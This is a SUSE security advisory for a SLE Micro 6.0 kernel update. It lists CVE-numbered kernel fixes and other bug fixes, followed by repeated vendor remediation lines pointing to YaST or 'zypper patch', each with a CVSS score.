- CVE-2025-68744: bpf: Free special fields when update [lru_,]percpu_hash maps (bsc#1255709).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: nfsd: set security label during create operations (bsc#1256770).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71096: RDMA/core: Check for the presence of LS_NLA_TYPE_DGID correctly (bsc#1256606).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" (bsc#1256760).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23010: ipv6: Fix use-after-free in inet6_addr_del() (bsc#1257332).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- Disable CONFIG_CPU5_WDT The cpu5wdt driver doesn't implement a
proper watchdog interface and has many code issues. It only handles
obscure and obsolete hardware. Stop building and supporting this driver
(jsc#PED-14062).
- Update config files (jsc#PED-12554 jsc#PED-6996
bsc#1243677 ltc#213602 bsc#1243678 ltc#213596)
CONFIG_IMA_KEYRINGS_PERMIT_SIGNED_BY_BUILTIN_OR_SECONDARY=y
CONFIG_INTEGRITY_CA_MACHINE_KEYRING_MAX=y
- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- cifs: Fix copy offload to flush destination region (bsc#1252511).
- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).
- cifs: Fix uncached read into ITER_KVEC iterator (bsc#1245449).
- cifs: make cifs_chan_update_iface() a void function (git-fixes).
- cifs: update dstaddr whenever channel iface is updated (git-fixes).
- cpuidle: menu: Use residency threshold in polling state override decisions (bsc#1255026).
- dm: fix queue start/stop imbalance under suspend/load/resume races (bsc#1253386)
- drm/amdgpu: update mappings not managed by KFD (bsc#1255428)
- ext4: use optimized mballoc scanning regardless of inode format (bsc#1254378).
- ext4: wait for ongoing I/O to complete before freeing blocks (bsc#1256366).
- fs: dlm: allow to F_SETLKW getting interrupted (bsc#1255025).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- media: atomisp: Prefix firmware paths with "intel/ipu/" (bsc#1252973).
- media: atomisp: Remove firmware_name module parameter (bsc#1252973).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: usb: pegasus: fix memory leak in update_eth_regs_async() (git-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- powerpc/eeh: fix recursive pci_lock_rescan_remove locking in EEH event
handling (bsc#1253262 ltc#216029).
- powerpc/kexec: Enable SMT before waking offline CPUs (bsc#1214285
bsc#1205462 ltc#200161 ltc#200588 git-fixes bsc#1253739 ltc#211493
bsc#1254244 ltc#216496).
- sched: Increase sched_tick_remote timeout (bsc#1254510).
- scsi: lpfc: Add capability to register Platform Name ID to fabric (bsc#1254119).
- scsi: lpfc: Allow support for BB credit recovery in point-to-point topology (bsc#1254119).
- scsi: lpfc: Ensure unregistration of rpis for received PLOGIs (bsc#1254119).
- scsi: lpfc: Fix leaked ndlp krefs when in point-to-point topology (bsc#1254119).
- scsi: lpfc: Fix reusing an ndlp that is marked NLP_DROPPED during FLOGI (bsc#1254119).
- scsi: lpfc: Modify kref handling for Fabric Controller ndlps (bsc#1254119).
- scsi: lpfc: Remove redundant NULL ptr assignment in lpfc_els_free_iocb() (bsc#1254119).
- scsi: lpfc: Revise discovery related function headers and comments (bsc#1254119).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).
- scsi: lpfc: Update lpfc version to 14.4.0.12 (bsc#1254119).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).
- scsi: lpfc: Update various NPIV diagnostic log messaging (bsc#1254119).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- soc/tegra: fuse: speedo-tegra210: Update speedo IDs (git-fixes).
- spi: tegra210-quad: Check hardware status on timeout (bsc#1253155)
- spi: tegra210-quad: Fix timeout handling (bsc#1253155)
- spi: tegra210-quad: Refactor error handling into helper functions (bsc#1253155)
- spi: tegra210-quad: Update dummy sequence configuration (git-fixes)
- supported.conf: Mark lan 743x supported (jsc#PED-14571)
- tracing: Fix access to trace_event_file (bsc#1254373).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).
- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).
- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).
- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).
- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).
- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any
unreleased standalone Zen5 microcode patches (bsc#1256528).
- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).
- x86/microcode/AMD: Fix __apply_microcode_amd()'s return value (bsc#1256528).
- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).
- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).
- x86/microcode/AMD: Select which microcode patch to load (bsc#1256528).
- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).
- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).
Patchnames: SUSE-SLE-Micro-6.0-kernel-281
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.2 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
